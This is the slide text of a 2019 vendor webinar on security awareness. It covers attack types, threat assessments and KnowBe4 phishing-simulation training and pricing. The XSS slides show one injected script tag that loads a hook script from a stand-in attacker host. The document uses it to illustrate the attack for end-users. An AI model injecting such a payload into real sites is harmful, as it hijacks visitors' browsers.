Welcome! System Source Pizza Webinar Security Awareness September 26, 2019 Email: Michelle Robinson Learning Center Director Email: [email protected]

Welcome! · Agenda Welcome from Michelle Robinson, System Source Learning Center Director and Shawn Duffy, President of Duffy Consulting Services, LLC The importance of cyber


Page 1

Welcome!

System Source Pizza Webinar

Security Awareness

September 26, 2019

Email:

Michelle Robinson – Learning Center Director

Email: [email protected]

Page 2

Agenda Welcome from Michelle Robinson, System Source Learning Center Director

and Shawn Duffy, President of Duffy Consulting Services, LLC

The importance of cyber security – Why security is still a problem

Types of attacks

Best practices for implementing Cyber Security – Why outsourcing is good practice

Assessment vs. scanning

The important role of the end-user

Q & A

Evaluation @ end of webinar & via email

Page 3

If it hasn’t arrived by 12:15

Please double check with your receptionist

Then call / email Mike Jones:

[email protected] OR 410-771-5544 x4355 (we are recording the webinar – so don’t think twice about stepping away for a few minutes to go pick it up at your front desk!)

We Hope You are Enjoying Your Pizza!!

Page 4

During the Webinar…

Audio – In presentation mode until end

Control Panel

View webinar in full screen mode

Feel Free to submit written questions

Open Q & A at the end

(please mute when not speaking)

Survey at conclusion of webinar

Page 5

Shawn Duffy

Principal

Duffy Compliance Services

Page 6

Duffy Consulting Services (DCS)

Cybersecurity Analysts help prevent attacks through their expertise and knowledge of threats and security controls.

Security controls: Safeguards or countermeasures to avoid, detect, counteract, or minimize security risks to physical property, information, computer systems, or other assets.

Take the guesswork out of how to secure your environment

Page 7

DCS = Cybersecurity Analyst

So why is security still a problem?

What exactly am I buying?

Security is not a component to making money

Security is not mandated – it is often considered overhead

What are the long-term costs?

How much can I afford?

Businesses have a different focus

Page 8

DCS = Cybersecurity Analyst

So why is security still a problem?

Security is like insurance

What is my risk-to-reward ratio?

Just a little security is fine. It’s not like I am forced to buy it.

Page 9

DCS = Cybersecurity Analyst

What about Compliance?

Compliance = Driven by “Check the Box”

“Can we just say we do it and figure out how later if we get audited?”

Compliance = the minimum set of security controls required

Page 10

DCS = Cybersecurity Analyst

“Tried & True” method to secure the environment

Is that enough?

Page 11

DCS = Cybersecurity Analyst

Types of Attacks

Impersonation

MitM

Session Hijacking

XSS

Privilege Escalation

Backdoors & Rootkits

Ransomware/Phishing

Page 12

Ransomware / Phishing

Page 13

Ransomware / Phishing

Page 14

Ransomware / Phishing

Page 15

Ransomware / Phishing

Page 16

MitM attack

Page 17

MitM attack

Page 18

MitM attack

Page 19

MitM attack

Page 20

MitM attack

Page 21

MitM attack

Page 22

Cross Site Scripting (XSS)

<script src="http://hackerIP:3000/hook.js" type="text/javascript"></script>

Page 23

Cross Site Scripting (XSS)

<script src="http://hackerIP:3000/hook.js" type="text/javascript"></script>

Page 24

DCS = Cybersecurity Analyst

How do you know you’re secure?

What the client gets using this method?

If outsourced, a hefty bill

CVSS scored results with little to do with your environment

Questions how to proceed

The cheap way:

Buy a scanner

Learn to run scans

Print out huge canned reports

Figure out what’s important

Page 25

DCS = Cybersecurity Analyst

Best Practices – Threat Assessments

Subject Matter Expert (SME) way:

Baselines

Information Gathering (including scans)

Data Analysis

Security Controls and Risk Analysis

Customized reporting and presentation

Findings based on the environment

Plan of Action

Building robustness into the environment

Prepares for Penetration Testing

Page 26

DCS = Cybersecurity Analyst

Best Practices – Assessments

Information Gathering

Infrastructure documentation

Security documentation

Network and host-based logs

Rulesets

Configuration and Configuration Management

Network traffic and metrics

Approved Ports, Protocols, and Services

Vulnerabilities

Web Application information

Wireless information

Page 27

DCS = Cybersecurity Analyst

Best Practices – Assessments

Review and Analysis

Determines gaps in security controls

Determines impacts to the business

Penetration Testing

System toleration to real-world attacks

Sophistication of attacker matters

Social Engineering (Phishing, Backdoors)

Password cracking

Wi-Fi access

Tests Countermeasures

Tests Detection and Response capabilities

Page 28

DCS = Cybersecurity Analyst

Best Practices – Assessments

Reporting

Findings

Supporting Documentation

Recommendations

Briefings and Presentations

Remediation

Plan of Action

Metrics to measure results

Roles & Responsibilities

Re-evaluations

Page 29

DCS = Cybersecurity Analyst

Best Practices – Assessments

Cost effective solution with progress milestones

Preparation for Pen Testing against the system

Answers on how to proceed

Results that are specific to your environment

Technical Support on conducting remediation

Re-evaluations confirming remediation tasks

Metrics to track security progress

What the client gets using this method?

Page 30

Duffy Compliance Services

Security Compliance Services

NIST-based such as DFARS CUI, HIPAA, FISMA

E.U. GDPR and U.S. State Privacy Acts (NYDFS & CCPA)

Security Policy and Procedure Development

Threat Management

Network Assessments

Web Application Assessments

Wireless Assessments

Continuous Monitoring

Security Awareness Training

Page 31

Michelle Robinson

Learning Center Director

System Source

Page 32

System Source and KnowBe4

Partnering to deliver high quality training and phishing tests

About KnowBe4

• World’s most popular Security Awareness Training and Simulated Phishing platform

• Training based on Kevin Mitnick’s 30+ years’ experience (The Dark Side Hacker)

Gartner peer insights puts KnowBe4 at the top of the list for overall rating including:

• Product capabilities

• Customer experience

• Willingness to recommend

We’ve helped 5,103 customers use KnowBe4!

Page 33

KnowBe4 Recognized by Gartner as a Leader – 3 Years in a Row

Magic Quadrant for Security Awareness Computer-Based Training 2019

Page 34

Why We Phish and Train

A staggering 91% of successful data breaches start with a spear phishing attack

Users Are the Last Line of Defense

• 91% of successful data breaches start with a spear phishing attack

• 30% of data breaches are caused by repeat offenders from within the organization

Page 35

Why We Phish and Train

Page 36

2019 Verizon Report Findings

There is good news!

Phish breach rates are going down.

Why?

Page 37

2019 Verizon Report Findings

Top Breaches:

Phishing - #1

Use of Stolen Credentials

Backdoors or C2 (Command and Control)

Top Hacking Techniques:

Email is the #1 delivery method

Office Document is the #1 file type

Phishing is the #1 technique

Human is the #1 target

Page 38

CEO Fraud

Page 39

Phishing Test Click Rate by Industry

Page 40

Our Approach

Baseline Testing

We provide baseline testing to assess the Phish-prone percentage of your users through a free simulated phishing attack.

Train Your Users

The world's largest library of security awareness training content, including interactive modules, videos, games, posters and newsletters. Automated training campaigns with scheduled reminder emails.

Phish Your Users

Best-in-class, fully automated simulated phishing attacks, hundreds of templates with unlimited usage, and community phishing templates.

See The Results

Enterprise-strength reporting, showing stats and graphs for both training and phishing, ready for management. Show the great ROI!

Page 41

Baseline Testing

4 templates for your free baseline phishing test

O365

Exchange

Gsuite

Network password

Page 42

KnowBe4 Training Modules

Silver – Basic training modules, simulated testing, reporting

Gold – Silver, plus intermediate training content, Email Exposure Check (EEC) reports, vishing tests

Platinum – Silver, Gold, advanced phishing features; Smart Groups, Reporting APIs, security roles, Social Engineering Indicator landing pages

Diamond – Silver, Gold, Platinum, advanced training content; full access to 700+ items including interactive modules, videos, games, posters and newsletters.

World’s Largest Library of Security Training Content In 4 Libraries

Page 43

Most Common Phishing Lures

Page 44

Most Common Phishing Lures

Page 45

Sample Phishing Tests

Page 46

Sample Phishing Tests

Page 47

2019 Phishing By Industry Benchmarking Study

KnowBe4 analyzed data from nearly nine million users across 18,000 organizations with over 20 million simulated phishing security tests across nineteen different industries.

Page 48

2019 Phishing By Industry Benchmarking Study

Results after 90 Days

Page 49

2019 Phishing By Industry Benchmarking Study

Results after training and phishing for 1 year

Page 50

Reporting

Page 51

Reporting

Page 52

[Chart: Training Impact on Phish Prone Staff (52 person sample). Y-axis: Phish Prone %, 0% to 30%. Annotations: “Training implemented for those failing”; “New hires without training”.]

Page 53

Value Proposition:

Risk and Operational Expenses

RISK

• Reduced malware infections

• Reduced data loss

• Reduced potential cyber-theft

• Users have security top of mind

OPEX

• Reduced help desk calls

• Reduced cleaning and re-imaging of machines

• Reduced downtime, increased user productivity

• Real ROI: Forrester's Total Economic Impact™ on KnowBe4 reports a 127% ROI with a one-month payback

“Social Engineering is information security’s weakest link.”

– Kevin Mitnick, ‘The World’s Most Famous Hacker’, IT Security Consultant

Page 54

Subscription Levels and Pricing

Silver Level

Admin Management Console

Unlimited Phishing Security Tests

Automated Security Awareness Program

Training Access Level I

Automated Training Campaigns

Crypto-Ransom Guarantee

Phish Alert Button

Active Directory Integration

Phishing Reply Tracking

Security ‘Hints & Tips’

Gold Level

Training Access Level II

Monthly Email Exposure Check

Vishing Security Test (voice mail)

Platinum Level

“Automated Human Pentesting”

USB Drive Test

Vulnerable Browser Plugin Detection

Priority Level Support

Social Engineering Indicators

Diamond Level

Training Access Level III

AIDA Artificial Intelligence-driven Agent BETA (AI Agent)

Seats (Per Year)    Corporate        Education/Non-Profit

25-50               $17.00-$29.50    $15.30-$26.55

51-100              $15.00-$26.50    $13.50-$23.85

101-500             $11.00-$20.50    $9.90-$18.45

501-1000            $10.00-$19.00    $9.00-$17.10

Optional Setup Fee for steps 1-5 is $20/person to a maximum of $1,000

Page 55

Thank you!

Page 56

Q&A

Please “Type in your question” & we will read your question and answer ☺